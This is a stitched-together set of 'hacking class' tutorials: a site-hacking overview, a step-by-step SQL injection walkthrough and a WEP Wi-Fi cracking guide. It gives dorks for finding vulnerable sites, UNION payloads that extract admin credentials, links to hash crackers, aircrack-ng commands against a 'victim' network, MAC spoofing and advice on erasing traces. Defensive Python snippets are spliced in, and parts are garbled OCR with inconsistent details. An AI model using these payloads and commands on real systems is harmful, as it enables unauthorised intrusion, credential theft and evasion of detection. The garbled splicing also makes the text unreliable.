c. Now there at the left hand top you will see a check box in front of which "Expert" is written. Click on that; now you will see several things in it. Now do the following settings one by one.

1. Click on "Scanner", click on all files and set the "Scanner Priority" to high and click on apply.

2. Click on "Guard" and click on all files and click on "Scan while reading and writing" and then click apply.

3. Click on "General", now click on select all and click on apply. In the general tab only, go to the WMI section and click on advanced process protection and then click on apply.

4. After doing that restart your PC.

Now you have made your free antivirus equivalent to the paid one.

Best Free Anti-Spyware: Spyware Terminator with Crawler Web Security toolbar.

Download it for free:


The solution of this problem is already provided: the Web browser Security toolbar will help you in surfing only secured and genuine websites, and if you want to visit and download, VirusTotal will help you to identify whether the file is infected or not.

5. Now for Hackers like me, i.e. a Method to use or test Hack tools.

Why I have mentioned this is simply because hackers always take advantage of these noobish tricks: they attach viruses to files and name them as hack tools. So avoid them if you are too curious like me. Then there are several ways to handle it.

1. Use Deep Freeze on the C drive: For testing hack tools always use Deep Freeze, as after the next restart your system will be at the same position as it was previously.

2. Install VirtualBox and inside VirtualBox install another Windows and test all hack tools using the virtual Windows. This will protect your system from being infected. Also it will give you more knowledge about handling viruses and other situations, like what I have to do when something goes wrong.

3. Create two to three fake email IDs and use them for testing keyloggers and other fake email hacking software.

For some more security tips you can also read my previous article:

HACKING WEB SERVER

Hello friends, welcome back to hacking class. Today I will explain all the methods that are being used to hack a website or a website's database. This is the first part of the class "How to hack a website or Website's database" and in this I will introduce all website hacking methods. Today I will give you the overview and in later classes we will discuss them one by one with practical examples. So guys get ready for the first part of the Hacking websites class.

Don't worry, I will also tell you how to protect your websites from these attacks and other methods like hardening of SQL and hardening of web servers, and key knowledge about CHMOD rights: what thing should be given what rights.

Note: This Post is only for Educational Purpose only.


What are basic things you should know before website hacking?

First of all, everything is optional as I will start from very scratch. But you need at least basic knowledge of the following things:

1. Basics of HTML, SQL, PHP.

2. Basic knowledge of Javascript.

3. Basic knowledge of servers: how servers work.

4. And most important, expertise in removing traces, otherwise you have to suffer the consequences.

Now the first two things you can learn from a very famous website for basics of website design with basics of HTML, SQL, PHP and Javascript:

http://www.w3schools.com/

And for the fourth point, that you should be expert in removing traces, for this you can refer to the first 5 hacking classes and especially read these two:

1. Hiding Yourself from being traced.

2. Removing your Traces

As we know traces are very important. Please don't ignore them, otherwise you can be in big trouble for simply doing nothing. So please take care of this step.

METHODS OF HACKING WEBSITE:

1. SQL INJECTION

2. CROSS SITE SCRIPTING

3. REMOTE FILE INCLUSION

4. LOCAL FILE INCLUSION

5. DDOS ATTACK

6. EXPLOITING VULNERABILITY

1. SQL INJECTION

First of all, what is SQL injection? SQL injection is a type of security exploit or loophole in which an attacker "injects" SQL code through a web form or manipulates the URLs based on SQL parameters. It exploits web applications that use client-supplied SQL queries.

The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.


2. CROSS SITE SCRIPTING

Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn't intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them, including the FBI, CNN, Ebay, Apple, Microsoft, and AOL.

Some website features commonly vulnerable to XSS attacks are:

• Search Engines

• Login Forms

• Comment Fields

Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

I will explain this in detail in later hacking classes. So keep reading..

3. REMOTE FILE INCLUSION

Remote file inclusion is the most often found vulnerability on websites.

Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website, which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.

RFI can lead to the following serious things on a website:

• Code execution on the web server

• Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).

• Denial of Service (DoS)

• Data Theft/Manipulation

4. LOCAL FILE INCLUSION

Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory traversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI's.

Let's say a hacker found a vulnerable site, www.target-site.com/index.php?p=about; by means of directory traversal he would try to browse to the /etc/passwd file:

www.target-site.com/index.php?p=../../../../../../../etc/passwd

I will explain it in detail with practical website examples in later sequential classes on Website Hacking.
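The traversal request above only works because the `p` parameter is joined straight onto a path. As an added example (not code from the course material), this is how an include resolver can take the same parameter safely; the directory layout and the `.php` suffix are assumptions for the demo, and the `demo()` helper builds a throwaway pages directory to try a benign and a traversal request against.

```python
"""Resolve a page name from a URL parameter without letting '../' escape the
template directory (the LFI pattern described above).

Added example, not part of the course material. The directory layout and the
page parameter name `p` are assumptions chosen for the demo.
"""
import os
import tempfile


def resolve_page(pages_dir: str, requested: str) -> str:
    """Return the absolute path of the requested page, or raise ValueError.

    Two independent checks: an allow-list on the parameter's characters, and a
    containment check on the canonical path. Either one alone would stop the
    '../../../../etc/passwd' probe; using both survives encoding tricks and
    symlink surprises better.
    """
    # 1. Only plain page names: letters, digits, '-' and '_'.
    if not requested or not all(c.isalnum() or c in "-_" for c in requested):
        raise ValueError(f"rejected page name: {requested!r}")

    # 2. Canonicalise and confirm the result still lives under pages_dir.
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, requested + ".php"))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes pages directory: {target}")
    if not os.path.isfile(target):
        raise ValueError(f"no such page: {requested}")
    return target


def demo() -> dict:
    """Create a throwaway pages directory and try a benign and a traversal
    request against it; returns which requests were accepted."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        pages = os.path.join(tmp, "pages")
        os.mkdir(pages)
        with open(os.path.join(pages, "about.php"), "w") as fh:
            fh.write("<h1>About</h1>")
        # Constructed requests: the page's own example, the traversal probe,
        # a null-byte variant and an empty parameter.
        for req in ["about", "../../../../../../../etc/passwd", "about%00", ""]:
            try:
                resolve_page(pages, req)
                results[req] = "served"
            except ValueError:
                results[req] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```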

5. DDOS ATTACK


Simply called distributed denial of service attack. A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In a DDoS attack we consume the bandwidth and resources of a website and make it unavailable to its legitimate users.

For a more detailed hack on DDOS visit:

6. EXPLOITING VULNERABILITY

It's not a new category; it comprises the above five categories, but I mentioned it separately because there are several exploits which cannot be covered in the above five categories. So I will explain them individually with examples. The basic idea behind this is to find the vulnerability in the website and exploit it to get the admin or moderator privileges so that you can manipulate things easily.

SQL INJECTION

Hello friends, in my previous class of How to hack websites, I explained the various topics that we will cover in hacking classes. Let's today start with the first topic: Hacking Websites using SQL injection tutorial. If you have missed the previous hacking class, don't worry, read it here.

So guys let's start our tutorial of Hacking Websites using the SQL injection technique. First of all, I will provide you a brief introduction about SQL injection.

Note: This article is for Educational Purposes only. Please Don't misuse it. Isoftdl and me are not responsible for any misuse done by you.

MySQL database is a very common database system these days that websites use, and you will be surprised by the fact that it's the most vulnerable database system ever. It has unlimited loopholes and fixing them is a very tedious task. Here we will discuss how to exploit those vulnerabilities manually without any tool.

Hacking Websites using SQL Injection

STEPS TO HACK WEBSITES USING SQL INJECTION

1. Finding the target and vulnerable websites

First of all we must find out our target website. I have collected a lot of dorks, i.e. the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable websites. Below is an example of some queries.

Examples: Open Google and copy paste these queries:

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

Search Google for more Google dorks to hack websites. I cannot put them on my website as they are too critical to discuss. We can discuss them in the comments of this post, so keep posting and reading there.

2. Checking for Vulnerability on the website

Suppose we have a website like this:


http://www.site.com/products.php?id=5

To test this URL, we add a quote to it:

http://www.site.com/products.php?id=5'

On executing it, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right ... etc" or something like that, that means the target website is vulnerable to SQL injection and you can hack it.

3. Find the number of columns

To find the number of columns we use the statement ORDER BY (tells the database how to order the result). So how to use it? Well, just increment the number until we get an error.

http://www.site.com/products.php?id=5 order by 1/* <-- no error

http://www.site.com/products.php?id=5 order by 2/* <-- no error

http://www.site.com/products.php?id=5 order by 3/* <-- no error

http://www.site.com/products.php?id=5 order by 4/* <-- Error (we get a message like "Unknown column '4' in 'order clause'" or something like that)

That means that it has 3 columns, because we got an error on 4.

4. Check for UNION function

With union we can select more data in one SQL statement.

So we have:

http://www.site.com/products.php?id=5 union all select 1,2,3/*

(we already found that the number of columns is 3 in section 2).

If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works.

5. Check for MySQL version

http://www.site.com/products.php?id=5 union all select 1,2,3/*

NOTE: if /* is not working or you get some error, then try --. It's a comment and it's important for our query to work properly.

Let's say that we have number 2 on the screen; now to check for the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.

It should look like this:


http://www.site.com/products.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE)": I didn't see any paper covering this problem, so I must write it.

What we need is the convert() function, i.e.:

http://www.site.com/products.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex(), i.e.:

http://www.site.com/products.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get the MySQL version.

6. Getting table and column name

Well, if the MySQL version is less than 5 (i.e. 4.1.33, 4.1.12) <-- later I will describe it for MySQL versions greater than 5.

We must guess table and column names in most cases.

Common table names are: user/s, admin/s, member/s

Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.

i.e. it would be:


http://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that's good)

We know that table admin exists.

Now to check column names:

http://www.site.com/products.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try the other column name)

We get the username displayed on screen; an example would be admin, or superadmin etc.

Now to check if column password exists:

http://www.site.com/products.php?id=5 union all select 1,password,3 from admin/*

(if you get an error, then try the other column name)

We see the password on the screen in hash or plain-text; it depends on how the database is set up, i.e. md5 hash, mysql hash, sha1.

Now we must complete the query to look nice. For that we can use the concat() function (it joins strings), i.e.:

http://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that I put 0x3a; it's the hex value for : (so 0x3a is the hex value for colon).


(there is another way for that, char(58), the ascii value for :)

http://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get displayed username:password on screen, i.e. admin:admin or admin:somehash.

When you have this, you can login like admin or some superuser.

If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so an example would be:

http://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

7. MySQL 5

Like I said before, I'm gonna explain how to get table and column names in MySQL greater than 5.

For this we need information_schema. It holds all tables and columns in the database.

To get tables we use table_name and information_schema.tables, i.e.:

http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*


Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables, i.e.:

http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Note that I put 0,1 (get 1 result starting from the 0th).

Now to view the second table, we change limit 0,1 to limit 1,1, i.e.:

http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed.

For the third table we put limit 2,1, i.e.:

http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc.

To get the column names the method is the same.


Here we use column_name and information_schema.columns. The method is the same as above, so an example would be:

http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is displayed.

The second one (we change limit 0,1 to limit 1,1), i.e.:

http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like username, user, login, password, pass, passwd etc.

If you wanna display column names for a specific table use this query (where clause). Let's say that we found table users, i.e.:

http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get displayed the column names in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if magic quotes is ON.

Let's say that we found columns user, pass and email.


Now to complete the query to put them all together. For that we use concat(), which I described earlier, i.e.:

http://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

What we get here is user:pass:email from table users.

Example: admin:hash:whatever@blabla.com

But the passwords are in hash format so we need to crack the hash. Note 90% of hashes are crackable but 10% are still there which are unable to be cracked. So don't feel bad if some hash doesn't crack.
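Every step above relies on one thing: products.php pastes the `id` parameter into the SQL string. The block below is an added example, not the course's own code; it runs the tutorial's probes (the quote test, ORDER BY, UNION) against a string-built query and against the same query with a bound parameter, using an in-memory SQLite table constructed for the demo in place of the MySQL site.

```python
"""Why the probes in the tutorial above work, and why parameterised queries
stop them. Added example, not part of the course material; the schema and
rows are constructed for the demo.
"""
import sqlite3

PROBES = [
    "5",                                  # a normal request
    "5'",                                 # step 2: the quote test
    "5 order by 3 --",                    # step 3: column count, fits
    "5 order by 4 --",                    # step 3: one column too many
    "5 union all select 1,2,3 --",        # step 4: the UNION check
    "5 union all select 1,name,price from products --",
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the tutorial's products table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table products(id integer, name text, price real)")
    db.executemany("insert into products values (?,?,?)",
                   [(5, "widget", 9.99), (6, "gadget", 19.99)])
    return db


def vulnerable_lookup(db, user_id: str):
    """products.php as the tutorial assumes it is written: the parameter is
    pasted straight into the SQL string."""
    sql = "select id, name, price from products where id=" + user_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"DB ERROR: {exc}"          # what the page leaks on a bad probe


def safe_lookup(db, user_id: str):
    """Same query with a bound parameter: the input is a value, never SQL."""
    try:
        value = int(user_id)           # the parameter is supposed to be a number
    except ValueError:
        return "rejected: id must be an integer"
    return db.execute("select id, name, price from products where id=?",
                      (value,)).fetchall()


def compare(probes=PROBES) -> dict:
    """Run every probe through both handlers; returns {probe: (vuln, safe)}."""
    db = make_db()
    return {p: (vulnerable_lookup(db, p), safe_lookup(db, p)) for p in probes}


if __name__ == "__main__":
    for probe, (vuln, safe) in compare().items():
        print(f"{probe!r:52} vulnerable={vuln!r}")
        print(f"{'':52} safe={safe!r}")
```

The vulnerable handler leaks a syntax error on `5'`, an ORDER BY error on the fourth column, and extra rows on the UNION probes; the parameterised one answers only the plain `5` and rejects everything else before it reaches the database.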

For Cracking the MD5 hash values you can use this:

1) Check the net whether this hash has been cracked before:

Download:

http://www.md5decrypter.co.uk

2) Crack the password with the help of a site:

Download:

http://www.milw0rm.com/cracker/insert.php

or

http://passcracking.com/index.php

3) Use an MD5 cracking software:

Download:

http://rapidshare.com/files/13696596/F_2.10_2b.rar
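From the server side, the whole sequence walked through in this SQL injection tutorial leaves a recognisable trail in the access log. The block below is an added example (not from the course material): a small rule set run over constructed combined-format log lines that replay the tutorial's probes against products.php, alongside ordinary traffic that must not be flagged.

```python
"""Spot the SQL injection probes from the tutorial above in web server access
logs. Added example, not part of the course material; the log lines are
constructed for the demo and the pattern list is a starting point, not a
complete ruleset.
"""
import re
from urllib.parse import unquote_plus

# Each rule: (name, compiled regex applied to the decoded request path+query).
RULES = [
    ("quote-probe",         re.compile(r"[?&]\w+=[^&]*'$")),
    ("order-by-probe",      re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select",        re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enumeration",  re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("version-fingerprint", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),
    ("comment-terminator",  re.compile(r"(/\*|--|#)\s*$")),
]

# Combined log format: we only need the client IP, request target and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify(target: str) -> list[str]:
    """Return the names of all rules that match one decoded request target."""
    decoded = unquote_plus(target)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(lines) -> list[dict]:
    """Parse access-log lines and return one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "target": m["target"],
                             "status": int(m["status"]), "rules": hits})
    return findings


# Constructed sample log: the tutorial's probe sequence against products.php,
# plus ordinary traffic (including a legitimate apostrophe) that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Aug/2019:10:01:02 +0000] "GET /products.php?id=5 HTTP/1.1" 200 4120
203.0.113.7 - - [17/Aug/2019:10:01:09 +0000] "GET /products.php?id=5' HTTP/1.1" 500 612
203.0.113.7 - - [17/Aug/2019:10:01:15 +0000] "GET /products.php?id=5%20order%20by%204/* HTTP/1.1" 500 612
203.0.113.7 - - [17/Aug/2019:10:01:30 +0000] "GET /products.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 4210
203.0.113.7 - - [17/Aug/2019:10:02:01 +0000] "GET /products.php?id=5+union+all+select+1,table_name,3+from+information_schema.tables+limit+0,1/* HTTP/1.1" 200 4230
198.51.100.4 - - [17/Aug/2019:10:02:10 +0000] "GET /index.php?p=about HTTP/1.1" 200 2048
198.51.100.4 - - [17/Aug/2019:10:02:12 +0000] "GET /search.php?q=O'Reilly+books HTTP/1.1" 200 3001
""".splitlines()


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:14} {f['status']} {', '.join(f['rules']):42} {f['target']}")
```

A burst of these rules from one client, especially with 500 responses on the quote and ORDER BY probes, is the signature of the manual walkthrough above.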

Password

STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD (best Linux available for hackers with more than 2000 hacking tools inbuilt).

Download Backtrack Linux Live CD from here: LINK HERE

2. SCAN TO GET THE VICTIM

Get the victim to attack, that is whose password you want to hack or crack.

Now enter the Backtrack Linux CD into your CD drive and start it. Once it's started click on the black box in the lower left corner to load up a KONSOLE. Now you should start your Wifi card. To do so type:

airmon-ng

You will see the name of your wireless card (mine is named "ath0"). From here on out, replace "ath0" with the name of your card. Now type:

airmon-ng stop ath0

then type:


ifconfig wifi0 down

then type:

macchanger --mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The above steps I have explained are to spoof yourself from being traced. In the above step we are spoofing our MAC address; this will keep us undiscovered.

Now type:

airodump-ng ath0

All above steps in one screenshot:


Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others and it's always a good idea to pick one that has the best signal strength, otherwise it will take a huge time to crack or hack the password or you may not be able to crack it at all.

Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.

Now you will see something like this:


3. SELECTING NETWORK FOR HACKING

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on; you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.
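The same airodump-ng listing that this step reads by eye is also what a network owner should audit: any access point still showing WEP (or no encryption) is exposed to exactly the attack described here. The block below is an added example, not from the course material; it assumes the CSV column layout airodump-ng writes with `-w` (header as shown) and the rows are constructed for the demo.

```python
"""Audit an airodump-ng network listing for the weak encryption that the
tutorial above targets. Added example, not part of the course material.
Assumes the CSV column layout airodump-ng writes with -w (header shown
below); the rows are constructed for the demo.
"""
import csv
import io

# Constructed sample in airodump-ng's CSV layout (only the access-point section).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:23:69:bb:2d:0f, 2019-08-17 10:00:01, 2019-08-17 10:05:40,  6,  54, WEP, WEP, , -41, 812, 6120,   0.  0.  0.  0,  7, HomeNet,
00:1a:2b:3c:4d:5e, 2019-08-17 10:00:01, 2019-08-17 10:05:40, 11,  54, WPA2, CCMP, PSK, -63, 790, 0,   0.  0.  0.  0,  9, Office-5G,
00:aa:bb:cc:dd:ee, 2019-08-17 10:00:07, 2019-08-17 10:05:38,  1,  54, OPN, , , -70, 455, 0,   0.  0.  0.  0,  5, Guest,
00:de:ad:be:ef:01, 2019-08-17 10:00:09, 2019-08-17 10:05:30,  6,  54, WPA, TKIP, PSK, -58, 802, 0,   0.  0.  0.  0,  6, Legacy,
"""

# Anything listed here should be migrated; WPA2/WPA3 rows are not reported.
RISK = {"OPN": "open: no encryption at all",
        "WEP": "WEP: key recoverable from captured IVs",
        "WPA": "WPA/TKIP: deprecated, upgrade to WPA2/WPA3"}


def parse_airodump(text: str) -> list[dict]:
    """Return one dict per access-point row, with stripped field values."""
    reader = csv.reader(io.StringIO(text), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = []
    for fields in reader:
        if len(fields) < len(header) - 1:   # skip blank lines / station section
            continue
        fields = [f.strip() for f in fields]
        rows.append(dict(zip(header, fields)))
    return rows


def weak_networks(rows: list[dict]) -> list[dict]:
    """Access points whose Privacy column is OPN, WEP or WPA (version 1)."""
    out = []
    for r in rows:
        # airodump may list several schemes ("WPA2 WPA"); judge by the first.
        privacy = r["Privacy"].split()[0] if r["Privacy"] else ""
        if privacy in RISK:
            out.append({"essid": r["ESSID"], "bssid": r["BSSID"],
                        "channel": int(r["channel"]), "ivs": int(r["# IV"]),
                        "finding": RISK[privacy]})
    return out


def audit(text: str = SAMPLE_CSV) -> list[dict]:
    """Parse a listing and return the networks that need attention."""
    return weak_networks(parse_airodump(text))


if __name__ == "__main__":
    for n in audit():
        print(f"{n['essid']:10} {n['bssid']}  ch{n['channel']:<3} IVs={n['ivs']:<6} {n['finding']}")
```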


Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this:

00:23:69:bb:2d:of

The channel number will be under a heading that says "CH". As shown in this figure:


Now in the same KONSOLE window type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension; just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it. It's simply because I love ben10. hhahahahaha :D

Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2 etc.

Once you've typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector", but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. The more difficult the password, the more packets you will need to crack it.

4. Cracking the WEP password


Now leave this 5onsole window up and running and open up a >nd 5onsole window.

#n this window type/

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44: ath0

This will send some commands to the router that basically tell it to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association successful :-)"

If this happens, then good! You are almost there.

Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean, just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds, sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Console window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Console window. This will be where we actually crack the password. Now type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap

Once you have done this you will see aircrack fire up and begin to crack the password. Typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000."


DON'T DO ANYTHING! It will stay running, it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! Now if the password looks goofy, don't worry, it will still work. Some passwords are saved in ASCII format, in which case aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format, in which case the computer will show you the HEX form of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:

se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password (the example hex key in this copy is unreadable) then it would still display in the same colon-separated pairs:

XX:XX:XX:XX:XX
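When you audit your own network this way, the key comes back in the colon-separated form described above and has to be turned back into something a client will accept. The following Python is an added example, not code from the CEH guide or from aircrack-ng: it strips the separators, decides whether the remaining string is a hex key or an ASCII key, and reports the key length in bits together with whether that is a standard WEP length. WEP keys are 40-bit or 104-bit, which is 5 or 13 ASCII characters or 10 or 26 hex digits; the guide's "secret" example is 6 characters, so the function reports it as a non-standard length rather than silently accepting it. The sample keys in the `__main__` block are constructed for illustration.

```python
# Added example (not from the CEH guide or aircrack-ng): normalise a key shown as
# colon-separated pairs ("se:cr:et") back into a usable key and sanity-check its
# length against the two real WEP key sizes (40 and 104 bits).
import string

HEX_DIGITS = set(string.hexdigits)
WEP_KEY_BITS = (40, 104)       # 5/13 ASCII characters or 10/26 hex digits
HEX_KEY_LENGTHS = (10, 26)


def strip_colons(display: str) -> str:
    """'se:cr:et' -> 'secret'. Only the separators are removed; the key's own
    characters are never altered."""
    return display.replace(":", "").strip()


def classify_wep_key(display: str) -> dict:
    """Classify a colon-separated key display as hex or ASCII and report its size.

    A string made only of hex digits whose length is a valid hex WEP key length
    is treated as hex; everything else is taken as an ASCII key. The two sets
    of valid lengths (10/26 vs 5/13) do not overlap, so this is unambiguous.
    """
    key = strip_colons(display)
    if not key:
        raise ValueError("empty key")
    is_hex = all(ch in HEX_DIGITS for ch in key) and len(key) in HEX_KEY_LENGTHS
    if is_hex:
        key_bytes = bytes.fromhex(key)
    else:
        key_bytes = key.encode("ascii")    # raises on non-ASCII input
    bits = len(key_bytes) * 8
    return {
        "form": "hex" if is_hex else "ascii",
        "key": key,                 # what you would type into the client
        "hex": key_bytes.hex(),     # the same key as hex, for clients that want it
        "bits": bits,
        "standard_length": bits in WEP_KEY_BITS,
    }


if __name__ == "__main__":
    # Constructed sample displays: the guide's ASCII example, a constructed
    # 40-bit hex key, and a constructed 5-character ASCII key.
    for shown in ("se:cr:et", "0A:1B:2C:3D:4E", "ab:cd:e"):
        info = classify_wep_key(shown)
        print(f"{shown:>16} -> {info['form']:<5} {info['key']:<12} "
              f"{info['bits']:>3} bits standard={info['standard_length']}")
```

The `standard_length` flag is the check worth keeping: a result that is not 40 or 104 bits means either the display was copied incorrectly or the key is not a WEP key at all, and in either case typing it into a client will not work.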


Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do falls completely on you because, technically, this is just for you to test the security of your own network.

I hope you all liked it. If you have any queries then ask me.